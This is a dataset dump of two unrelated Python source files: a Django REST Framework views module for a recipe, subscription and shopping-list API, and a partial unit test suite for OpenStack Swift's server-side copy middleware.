| 39.119454
| 79
| 0.655819
|
import csv
from django.contrib.auth import get_user_model
from django.db.models.aggregates import Sum
from django.http.response import HttpResponse
from django.utils.decorators import method_decorator
from djoser.serializers import SetPasswordSerializer
from djoser.views import TokenCreateView
from drf_yasg.utils import swagger_auto_schema
from rest_framework import filters, status
from rest_framework.decorators import action
from rest_framework.generics import get_object_or_404
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.viewsets import ModelViewSet
from api import serializers
from api.decorators import multi_method_decorator
from api.docs.schemas import (EmptyAutoSchema, follower_params,
recipe_request_body)
from api.filters import GlobalFilterBackend
from api.pagination import FollowPagination, LimitPagination
from api.permissions import (IsAdminOrReadIfAuthenticatedObjPerm,
IsAdminOrReadOnly, RecipePermission)
from food.models import Ingredient, IngredientInRecipe, Recipe, Tag
from interactions.models import Favorite, Follow, Purchase
User = get_user_model()
class CustomTokenCreateView(TokenCreateView):
def _action(self, serializer):
response = super()._action(serializer)
response.status_code = status.HTTP_201_CREATED
return response
@multi_method_decorator(
names=['update', 'partial_update', 'destroy'],
decorator=swagger_auto_schema(auto_schema=None)
)
class CustomUserViewSet(ModelViewSet):
queryset = User.objects.all().order_by('id')
serializer_class = serializers.CustomUserSerializer
pagination_class = LimitPagination
permission_classes = (IsAdminOrReadIfAuthenticatedObjPerm,)
def get_serializer_class(self):
if self.action in ('list', 'retrieve', 'me'):
return serializers.CustomUserGetSerializer
elif self.action == 'set_password':
return SetPasswordSerializer
elif self.action == 'subscriptions':
return serializers.SubscriptionsSerializer
elif self.action == 'subscribe':
return serializers.FollowSerializer
return self.serializer_class
@action(['get'], detail=False,
permission_classes=(IsAuthenticated,))
@swagger_auto_schema(auto_schema=EmptyAutoSchema)
def me(self, request, pk=None):
serializer = self.get_serializer(self.request.user)
return Response(serializer.data, status=status.HTTP_200_OK)
@action(['post'], detail=False, permission_classes=(IsAuthenticated,))
@swagger_auto_schema(request_body=SetPasswordSerializer,
responses={204: 'No Content'})
def set_password(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.request.user.set_password(
serializer.validated_data['new_password']
)
self.request.user.save()
return Response(status=status.HTTP_204_NO_CONTENT)
@action(['get'], detail=False, pagination_class=FollowPagination,
permission_classes=[IsAuthenticated])
@swagger_auto_schema(responses={201: serializers.SubscriptionsSerializer})
def subscriptions(self, request):
queryset = Follow.objects.filter(user=request.user)
if not queryset.exists():
return Response({'error': 'Вы еще ни на кого не подписаны'},
status=status.HTTP_400_BAD_REQUEST)
page = self.paginate_queryset(queryset)
if page:
serializer = self.get_serializer(
page,
many=True,
context={'request': request}
)
return self.get_paginated_response(serializer.data)
serializer = self.get_serializer(queryset, many=True,
context={'request': request})
return Response(serializer.data)
@action(['get'], detail=True, permission_classes=[IsAuthenticated])
@swagger_auto_schema(manual_parameters=follower_params,
responses={201: serializers.SubscriptionsSerializer})
def subscribe(self, request, pk=None):
user, author = self.following_validate(request, pk)
if not author:
return Response({'error': user},
status=status.HTTP_400_BAD_REQUEST)
data = {'user': user.id, 'author': author.id}
serializer = self.get_serializer(
data=data, context={'request': request}
)
serializer.is_valid(raise_exception=True)
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
@subscribe.mapping.delete
def delete_subscribe(self, request, pk=None):
user, author, subscribe = self.following_validate(request, pk,
delete=True)
if not author or not subscribe:
return Response({'error': user},
status=status.HTTP_400_BAD_REQUEST)
subscribe.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
def following_validate(self, request, pk, delete=False):
user = request.user
if not User.objects.filter(id=pk).exists():
if delete:
return 'Такого пользователя еще нет', False, False
return 'Такого пользователя еще нет', False
author = get_object_or_404(User, id=pk)
if delete:
if not Follow.objects.filter(user=user, author=author).exists():
return ('У вас еще нет этого пользователя в подписках',
True, False)
else:
return (user, author,
get_object_or_404(Follow, user=user,
author=author))
return user, author
@multi_method_decorator(
names=['create', 'update', 'partial_update', 'destroy'],
decorator=swagger_auto_schema(auto_schema=None)
)
class TagViewSet(ModelViewSet):
queryset = Tag.objects.all()
serializer_class = serializers.TagSerializer
permission_classes = (IsAdminOrReadOnly,)
@multi_method_decorator(
names=['create', 'update', 'partial_update', 'destroy'],
decorator=swagger_auto_schema(auto_schema=None)
)
class IngredientsViewSet(ModelViewSet):
queryset = Ingredient.objects.all()
serializer_class = serializers.IngredientSerializer
permission_classes = (IsAdminOrReadOnly,)
filter_backends = (filters.SearchFilter,)
search_fields = ('name', )
@method_decorator(
swagger_auto_schema(
request_body=recipe_request_body,
responses={201: serializers.RecipeSerializer}
),
name='create'
)
@method_decorator(
swagger_auto_schema(
request_body=recipe_request_body,
responses={200: serializers.RecipeSerializer}
),
name='update'
)
@method_decorator(
swagger_auto_schema(auto_schema=None),
name='partial_update'
)
class RecipeViewSet(ModelViewSet):
queryset = Recipe.objects.all()
serializer_class = serializers.RecipeSerializer
pagination_class = LimitPagination
permission_classes = (RecipePermission,)
filter_backends = (GlobalFilterBackend,)
filterset_fields = ('author', )
def get_serializer_class(self):
if self.action == 'favorite':
return serializers.FavoriteSerializer
elif self.action == 'shopping_cart':
return serializers.PurchaseSerializer
return self.serializer_class
@action(['get'], detail=True, permission_classes=[IsAuthenticated])
@swagger_auto_schema(responses={201: serializers.RecipeLiteSerializer})
def favorite(self, request, pk=None):
return self.alt_endpoint_create(request, pk)
@favorite.mapping.delete
def delete_favorite(self, request, pk=None):
return self.alt_endpoint_delete(request, pk, favorite=True)
@action(['get'], detail=True, permission_classes=[IsAuthenticated])
@swagger_auto_schema(responses={201: serializers.RecipeLiteSerializer})
def shopping_cart(self, request, pk=None):
return self.alt_endpoint_create(request, pk)
@shopping_cart.mapping.delete
def delete_shopping_cart(self, request, pk=None):
return self.alt_endpoint_delete(request, pk, cart=True)
@action(['get'], detail=False, permission_classes=(IsAuthenticated,))
@swagger_auto_schema(auto_schema=EmptyAutoSchema,
responses={200: 'Download', 401: 'NotAuthorized'})
def download_shopping_cart(self, request):
ingredients = (
IngredientInRecipe.objects
.select_related('ingredient', 'recipe')
.prefetch_related('purchases')
.filter(recipe__purchases__user=request.user)
.values_list('ingredient__name', 'ingredient__measurement_unit')
.annotate(amount=Sum('amount'))
)
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = ('attachment;'
'filename="Your_shopping_list.csv"')
writer = csv.writer(response)
writer.writerow(['Ингредиент', 'Единица измерения', 'Количество'])
for ingredient in ingredients:
writer.writerow(ingredient)
return response
def alt_endpoint_create(self, request, pk):
verdict, recipe, user = self.recipe_validate(request, pk)
if not verdict:
return recipe
data = {
'user': user.id,
'recipe': recipe.id,
}
serializer = self.get_serializer(data=data,
context={'request': request})
serializer.is_valid(raise_exception=True)
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
def alt_endpoint_delete(self, request, pk, favorite=False, cart=False):
verdict, obj = self.recipe_validate(request, pk, delete=True,
favorite=favorite, cart=cart)
if not verdict:
return obj
obj.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
def recipe_validate(self, request, pk, delete=False,
favorite=False, cart=False):
user = request.user
if not Recipe.objects.filter(id=pk).exists():
return False, Response({'error': 'Такого рецепта еще нет'},
status=status.HTTP_400_BAD_REQUEST), None
recipe = get_object_or_404(Recipe, id=pk)
if delete:
model_answer = {
'favorite': (Favorite, 'избранном'),
'cart': (Purchase, 'списке покупок')
}
if favorite:
model, answer = model_answer.get('favorite')
if cart:
model, answer = model_answer.get('cart')
if not model.objects.filter(user=user, recipe=recipe).exists():
return False, Response(
{'error': f'Такого рецепта еще нет в вашем {answer}'},
status=status.HTTP_400_BAD_REQUEST
)
return True, get_object_or_404(model, user=user, recipe=recipe)
return True, recipe, user
| true
| true
|
f705de9ae40aeb7ac96605765acb1cf9903cb9e3
| 70,522
|
py
|
Python
|
test/unit/common/middleware/test_copy.py
|
gyaozhou/swift-read
|
16fe18ae3be59a095f3bafdd69fe74b48a2771cb
|
[
"Apache-2.0"
] | null | null | null |
test/unit/common/middleware/test_copy.py
|
gyaozhou/swift-read
|
16fe18ae3be59a095f3bafdd69fe74b48a2771cb
|
[
"Apache-2.0"
] | null | null | null |
test/unit/common/middleware/test_copy.py
|
gyaozhou/swift-read
|
16fe18ae3be59a095f3bafdd69fe74b48a2771cb
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Copyright (c) 2015 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
import unittest
from hashlib import md5
from six.moves import urllib
from swift.common import swob
from swift.common.middleware import copy
from swift.common.storage_policy import POLICIES
from swift.common.swob import Request, HTTPException
from swift.common.utils import closing_if_possible
from test.unit import patch_policies, debug_logger, FakeMemcache, FakeRing
from test.unit.common.middleware.helpers import FakeSwift
from test.unit.proxy.controllers.test_obj import set_http_connect, \
PatchedObjControllerApp
class TestCopyConstraints(unittest.TestCase):
def test_validate_copy_from(self):
req = Request.blank(
'/v/a/c/o',
headers={'x-copy-from': 'c/o2'})
src_cont, src_obj = copy._check_copy_from_header(req)
self.assertEqual(src_cont, 'c')
self.assertEqual(src_obj, 'o2')
req = Request.blank(
'/v/a/c/o',
headers={'x-copy-from': 'c/subdir/o2'})
src_cont, src_obj = copy._check_copy_from_header(req)
self.assertEqual(src_cont, 'c')
self.assertEqual(src_obj, 'subdir/o2')
req = Request.blank(
'/v/a/c/o',
headers={'x-copy-from': '/c/o2'})
src_cont, src_obj = copy._check_copy_from_header(req)
self.assertEqual(src_cont, 'c')
self.assertEqual(src_obj, 'o2')
def test_validate_bad_copy_from(self):
req = Request.blank(
'/v/a/c/o',
headers={'x-copy-from': 'bad_object'})
self.assertRaises(HTTPException,
copy._check_copy_from_header, req)
def test_validate_destination(self):
req = Request.blank(
'/v/a/c/o',
headers={'destination': 'c/o2'})
src_cont, src_obj = copy._check_destination_header(req)
self.assertEqual(src_cont, 'c')
self.assertEqual(src_obj, 'o2')
req = Request.blank(
'/v/a/c/o',
headers={'destination': 'c/subdir/o2'})
src_cont, src_obj = copy._check_destination_header(req)
self.assertEqual(src_cont, 'c')
self.assertEqual(src_obj, 'subdir/o2')
req = Request.blank(
'/v/a/c/o',
headers={'destination': '/c/o2'})
src_cont, src_obj = copy._check_destination_header(req)
self.assertEqual(src_cont, 'c')
self.assertEqual(src_obj, 'o2')
def test_validate_bad_destination(self):
req = Request.blank(
'/v/a/c/o',
headers={'destination': 'bad_object'})
self.assertRaises(HTTPException,
copy._check_destination_header, req)
class TestServerSideCopyMiddleware(unittest.TestCase):
def setUp(self):
self.app = FakeSwift()
self.ssc = copy.filter_factory({})(self.app)
self.ssc.logger = self.app.logger
def tearDown(self):
self.assertEqual(self.app.unclosed_requests, {})
def call_app(self, req, app=None, expect_exception=False):
if app is None:
app = self.app
self.authorized = []
def authorize(req):
self.authorized.append(req)
if 'swift.authorize' not in req.environ:
req.environ['swift.authorize'] = authorize
req.headers.setdefault("User-Agent", "Bruce Wayne")
status = [None]
headers = [None]
def start_response(s, h, ei=None):
status[0] = s
headers[0] = h
body_iter = app(req.environ, start_response)
body = ''
caught_exc = None
try:
# appease the close-checker
with closing_if_possible(body_iter):
for chunk in body_iter:
body += chunk
except Exception as exc:
if expect_exception:
caught_exc = exc
else:
raise
if expect_exception:
return status[0], headers[0], body, caught_exc
else:
return status[0], headers[0], body
def call_ssc(self, req, **kwargs):
return self.call_app(req, app=self.ssc, **kwargs)
def assertRequestEqual(self, req, other):
self.assertEqual(req.method, other.method)
self.assertEqual(req.path, other.path)
def test_no_object_in_path_pass_through(self):
self.app.register('PUT', '/v1/a/c', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c', method='PUT')
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertEqual(len(self.authorized), 1)
self.assertRequestEqual(req, self.authorized[0])
def test_object_pass_through_methods(self):
for method in ['DELETE', 'GET', 'HEAD', 'REPLICATE']:
self.app.register(method, '/v1/a/c/o', swob.HTTPOk, {})
req = Request.blank('/v1/a/c/o', method=method)
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '200 OK')
self.assertEqual(len(self.authorized), 1)
self.assertRequestEqual(req, self.authorized[0])
self.assertNotIn('swift.orig_req_method', req.environ)
def test_basic_put_with_x_copy_from(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o2', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o2', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o2', self.authorized[1].path)
self.assertEqual(self.app.swift_sources[0], 'SSC')
self.assertEqual(self.app.swift_sources[1], 'SSC')
# For basic test cases, assert orig_req_method behavior
self.assertNotIn('swift.orig_req_method', req.environ)
def test_static_large_object_manifest(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk,
{'X-Static-Large-Object': 'True',
'Etag': 'should not be sent'}, 'passed')
self.app.register('PUT', '/v1/a/c/o2?multipart-manifest=put',
swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o2?multipart-manifest=get',
environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(2, len(self.app.calls))
self.assertEqual('GET', self.app.calls[0][0])
get_path, qs = self.app.calls[0][1].split('?')
params = urllib.parse.parse_qs(qs)
self.assertDictEqual(
{'format': ['raw'], 'multipart-manifest': ['get']}, params)
self.assertEqual(get_path, '/v1/a/c/o')
self.assertEqual(self.app.calls[1],
('PUT', '/v1/a/c/o2?multipart-manifest=put'))
req_headers = self.app.headers[1]
self.assertNotIn('X-Static-Large-Object', req_headers)
self.assertNotIn('Etag', req_headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o2', self.authorized[1].path)
def test_static_large_object(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk,
{'X-Static-Large-Object': 'True',
'Etag': 'should not be sent'}, 'passed')
self.app.register('PUT', '/v1/a/c/o2',
swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o2',
environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(self.app.calls, [
('GET', '/v1/a/c/o'),
('PUT', '/v1/a/c/o2')])
req_headers = self.app.headers[1]
self.assertNotIn('X-Static-Large-Object', req_headers)
self.assertNotIn('Etag', req_headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o2', self.authorized[1].path)
def test_basic_put_with_x_copy_from_across_container(self):
self.app.register('GET', '/v1/a/c1/o1', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c2/o2', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c2/o2', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c1/o1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c1/o1') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c1/o1', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c2/o2', self.authorized[1].path)
def test_basic_put_with_x_copy_from_across_container_and_account(self):
self.app.register('GET', '/v1/a1/c1/o1', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a2/c2/o2', swob.HTTPCreated, {},
'passed')
req = Request.blank('/v1/a2/c2/o2', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c1/o1',
'X-Copy-From-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c1/o1') in headers)
self.assertTrue(('X-Copied-From-Account', 'a1') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a1/c1/o1', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a2/c2/o2', self.authorized[1].path)
def test_copy_non_zero_content_length(self):
req = Request.blank('/v1/a/c2/o2', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '10',
'X-Copy-From': 'c1/o1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '400 Bad Request')
def test_copy_non_zero_content_length_with_account(self):
req = Request.blank('/v1/a2/c2/o2', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '10',
'X-Copy-From': 'c1/o1',
'X-Copy-From-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '400 Bad Request')
def test_copy_with_slashes_in_x_copy_from(self):
self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c/o/o2'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o/o2') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_copy_with_slashes_in_x_copy_from_and_account(self):
self.app.register('GET', '/v1/a1/c1/o/o1', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a2/c2/o2', swob.HTTPCreated, {})
req = Request.blank('/v1/a2/c2/o2', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c1/o/o1',
'X-Copy-From-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c1/o/o1') in headers)
self.assertTrue(('X-Copied-From-Account', 'a1') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a1/c1/o/o1', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a2/c2/o2', self.authorized[1].path)
def test_copy_with_spaces_in_x_copy_from(self):
self.app.register('GET', '/v1/a/c/o o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
# space in soure path
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c/o%20o2'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('GET', method)
self.assertEqual('/v1/a/c/o o2', path)
self.assertTrue(('X-Copied-From', 'c/o%20o2') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o%20o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_copy_with_spaces_in_x_copy_from_and_account(self):
self.app.register('GET', '/v1/a/c/o o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
# space in soure path
req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c/o%20o2',
'X-Copy-From-Account': 'a'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('GET', method)
self.assertEqual('/v1/a/c/o o2', path)
self.assertTrue(('X-Copied-From', 'c/o%20o2') in headers)
self.assertTrue(('X-Copied-From-Account', 'a') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o%20o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_copy_with_leading_slash_in_x_copy_from(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
# repeat tests with leading /
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('GET', method)
self.assertEqual('/v1/a/c/o', path)
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_copy_with_leading_slash_in_x_copy_from_and_account(self):
# repeat tests with leading /
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o',
'X-Copy-From-Account': 'a'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('GET', method)
self.assertEqual('/v1/a/c/o', path)
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertTrue(('X-Copied-From-Account', 'a') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_copy_with_leading_slash_and_slashes_in_x_copy_from(self):
self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o/o2'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('GET', method)
self.assertEqual('/v1/a/c/o/o2', path)
self.assertTrue(('X-Copied-From', 'c/o/o2') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_copy_with_leading_slash_and_slashes_in_x_copy_from_acct(self):
self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o/o2',
'X-Copy-From-Account': 'a'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('GET', method)
self.assertEqual('/v1/a/c/o/o2', path)
self.assertTrue(('X-Copied-From', 'c/o/o2') in headers)
self.assertTrue(('X-Copied-From-Account', 'a') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_copy_with_no_object_in_x_copy_from(self):
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '412 Precondition Failed')
def test_copy_with_no_object_in_x_copy_from_and_account(self):
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c',
'X-Copy-From-Account': 'a'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '412 Precondition Failed')
def test_copy_with_bad_x_copy_from_account(self):
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o',
'X-Copy-From-Account': '/i/am/bad'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '412 Precondition Failed')
def test_copy_server_error_reading_source(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {})
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '503 Service Unavailable')
def test_copy_server_error_reading_source_and_account(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {})
req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o',
'X-Copy-From-Account': 'a'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '503 Service Unavailable')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_copy_not_found_reading_source(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {})
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '404 Not Found')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_copy_not_found_reading_source_and_account(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {})
req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o',
'X-Copy-From-Account': 'a'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '404 Not Found')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_copy_with_object_metadata(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o',
'X-Object-Meta-Ours': 'okay'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a/c/o', path)
self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay')
self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_copy_with_object_metadata_and_account(self):
self.app.register('GET', '/v1/a1/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o',
'X-Object-Meta-Ours': 'okay',
'X-Copy-From-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a/c/o', path)
self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay')
self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a1/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
